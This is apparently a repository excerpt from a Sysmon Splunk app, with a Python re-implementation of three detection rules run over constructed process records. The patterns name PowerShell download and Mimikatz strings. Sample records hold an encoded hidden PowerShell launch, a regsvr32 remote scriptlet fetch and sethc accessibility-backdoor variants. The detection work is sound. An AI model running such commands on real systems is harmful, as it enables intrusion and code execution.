https://raw.githubusercontent.com/MHaggis/sysmon-splunk-app/5c6e54e869f2b536c482c3534a16835725b44386/static/appIconAlt_2x.png -------------------------------------------------------------------------------- /static/appIcon_2x.png: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/MHaggis/sysmon-splunk-app/5c6e54e869f2b536c482c3534a16835725b44386/static/appIcon_2x.png --------------------------------------------------------------------------------
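The search logic of the `[IOC - Powershell Suspicious Strings 01]`, `[T1015_Accessibility_Backdoor]` and `[T1117 - REGSVR Proxy Execution]` stanzas from savedsearches.conf, re-implemented in Python and run over constructed Sysmon EventCode 1 records so the wildcard terms and the SCCM `NOT` clause can be checked without a Splunk instance. This is an added example, not code from the app or its authors: the records, host names and the `glob` helper are assumptions, bare (field-less) terms are approximated by matching against the concatenated field values rather than Splunk's tokenized `_raw`, and the regsvr32 term is widened to `*/i:*http*` so `https://` scriptlet URLs match too.

```python
"""Offline re-implementation of three savedsearches.conf detections from the
Sysmon Splunk app (added example; not part of the app). Runs over constructed
Sysmon EventCode 1 records so the wildcard semantics can be checked offline."""
import re
from typing import Callable, Dict, List


def glob(pattern: str) -> Callable[[str], bool]:
    """Splunk-style wildcard term (only '*' is special) as a case-insensitive
    full-string match, which is how Splunk compares field values."""
    rx = re.compile("^" + ".*".join(re.escape(p) for p in pattern.split("*")) + "$",
                    re.IGNORECASE | re.DOTALL)
    return lambda text: rx.match(text) is not None


def raw(event: Dict[str, str]) -> str:
    """Approximation of _raw: a bare search term can hit any field, not just CommandLine."""
    return " ".join(event.values())


# [IOC - Powershell Suspicious Strings 01]: OR'd bare terms, then NOT the SCCM client path.
PS_TERMS = [glob(t) for t in (
    "*-W*Hidden*", "*-nologo*", "*-nop*", "*IEX*", "*Out-MiniDump*", "*-enc*",
    "*-EncodedCommand*", "*DownloadString*", "*DownloadFile*", "*DownloadData*",
    "*ShellExecute*", "*Invoke-Mimikatz*", "*schtasks*create*", "*Webclient*",
    "*FromBase64String*", "*IO.StreamReader*", "*IO.MemoryStream*",
    "*IO.Compression.DeflateStream*")]
CCM_EXCLUDE = glob(r"*C:\windows\ccm\*")


def powershell_suspicious_strings(e: Dict[str, str]) -> bool:
    if e["process"].lower() != "powershell.exe":
        return False
    text = raw(e)
    return any(t(text) for t in PS_TERMS) and not CCM_EXCLUDE(text)


# [T1015_Accessibility_Backdoor]: parent/child pairs around winlogon.exe and utilman.exe.
WINLOGON, UTILMAN = glob(r"*\winlogon.exe"), glob(r"*\utilman.exe")
UTILMAN_DEBUG = glob("*/debug*")
SETHC_ARGS = [glob("*sethc.exe 211*"), glob("*sethc.exe 101*")]
EASE_OF_ACCESS = [glob(p) for p in ("*osk.exe*", "*magnify.exe*", "*narrator.exe*",
                                    "*DisplaySwitch.exe*", "*AtBroker.exe*")]


def accessibility_backdoor(e: Dict[str, str]) -> bool:
    """As written, the child must itself be utilman.exe or sethc.exe. With an IFEO
    Debugger hijack winlogon starts the debugger (e.g. cmd.exe) with 'sethc.exe 211'
    appended, so the process=sethc.exe condition never matches that variant."""
    proc, cmd, parent = e["process"].lower(), e["CommandLine"], e["ParentImage"]
    if WINLOGON(parent):
        if proc == "utilman.exe" and UTILMAN_DEBUG(cmd):
            return True
        if proc == "sethc.exe" and any(m(cmd) for m in SETHC_ARGS):
            return True
    return UTILMAN(parent) and any(m(cmd) for m in EASE_OF_ACCESS)


# [T1117 - REGSVR Proxy Execution], widened from */i:*http://* so https:// also matches.
REGSVR_URL = glob("*/i:*http*")


def regsvr32_proxy_execution(e: Dict[str, str]) -> bool:
    return e["process"].lower() == "regsvr32.exe" and REGSVR_URL(e["CommandLine"])


RULES = {
    "IOC - Powershell Suspicious Strings 01": powershell_suspicious_strings,
    "T1015_Accessibility_Backdoor": accessibility_backdoor,
    "T1117 - REGSVR Proxy Execution": regsvr32_proxy_execution,
}

# Constructed records (not real logs) using the field names the app's searches use;
# 'process' is the Sysmon TA's file-name form of Image.
EVENTS: List[Dict[str, str]] = [
    {"host": "WS01", "process": "powershell.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4A",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "User": r"CORP\alice"},
    {"host": "WS02", "process": "powershell.exe",  # SCCM client: removed by the NOT clause
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -NoProfile -File C:\windows\ccm\SystemTemp\inv.ps1",
     "ParentImage": r"C:\windows\ccm\CcmExec.exe", "User": r"NT AUTHORITY\SYSTEM"},
    {"host": "WS03", "process": "sethc.exe",  # replaced-binary variant
     "Image": r"C:\Windows\System32\sethc.exe", "CommandLine": "sethc.exe 211",
     "ParentImage": r"C:\Windows\System32\winlogon.exe", "User": r"NT AUTHORITY\SYSTEM"},
    {"host": "WS03", "process": "cmd.exe",  # IFEO Debugger variant
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"C:\Windows\System32\cmd.exe sethc.exe 211",
     "ParentImage": r"C:\Windows\System32\winlogon.exe", "User": r"NT AUTHORITY\SYSTEM"},
    {"host": "WS04", "process": "regsvr32.exe",
     "Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": "regsvr32.exe /s /n /u /i:https://example.invalid/a.sct scrobj.dll",
     "ParentImage": r"C:\Windows\System32\cmd.exe", "User": r"CORP\bob"},
    {"host": "WS05", "process": "notepad.exe",  # benign
     "Image": r"C:\Windows\System32\notepad.exe", "CommandLine": "notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "User": r"CORP\carol"},
]


def run_rules(events: List[Dict[str, str]]) -> Dict[str, List[str]]:
    """Return {stanza name: [host of each matching event]} in event order."""
    hits: Dict[str, List[str]] = {name: [] for name in RULES}
    for e in events:
        for name, rule in RULES.items():
            if rule(e):
                hits[name].append(e["host"])
    return hits


if __name__ == "__main__":
    for name, hosts in run_rules(EVENTS).items():
        print(f"{name}: {hosts}")
    ifeo = EVENTS[3]
    print("IFEO variant caught by the stanza as written:", accessibility_backdoor(ifeo))
    print("IFEO variant caught by the CommandLine term alone:",
          glob("*sethc.exe 211*")(ifeo["CommandLine"]))
```

Two things the run shows that the conf alone does not: `*-nop*` also matches `-NoProfile`, so the `NOT ( C:\\windows\\ccm\\)` exclusion is doing real work against the SCCM client, and the accessibility stanza only fires for the replaced-binary form of the technique because the IFEO form changes `process` to the debugger while the `sethc.exe 211` argument survives in `CommandLine`.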